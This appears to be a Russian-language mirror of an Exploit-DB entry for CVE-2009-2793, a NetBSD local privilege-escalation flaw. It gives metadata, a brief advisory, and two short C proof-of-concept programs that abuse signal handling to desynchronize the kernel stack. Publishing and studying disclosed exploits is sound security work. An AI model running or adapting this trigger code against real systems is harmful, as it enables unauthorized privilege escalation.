- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 33229
- Проверка EDB
-
- Пройдено
- Автор
- TAVIS ORMANDY
- Тип уязвимости
- LOCAL
- Платформа
- BSD
- CVE
- cve-2009-2793
- Дата публикации
- 2009-09-16
C:
/*
source: https://www.securityfocus.com/bid/36430/info
NetBSD is prone to a local privilege-escalation vulnerability.
A local attacker may exploit this issue to cause the kernel stack to become desynchronized. This may allow the attacker to gain elevated privileges or may aid in further attacks.
*/
/* ... */
int main(int argc, char **argv)
{
jmp_buf env;
void handlesig(int n) {
longjmp(env, 1);
}
signal(SIGSEGV, handlesig);
if (setjmp(env) == 0) {
( (void(*)(void)) NULL) ();
}
return 0;
}
/* ... */
int main(int argc, char **argv)
{
char baguette;
signal(SIGABRT, (void (*)(int))&baguette);
abort();
}- Источник
- www.exploit-db.com
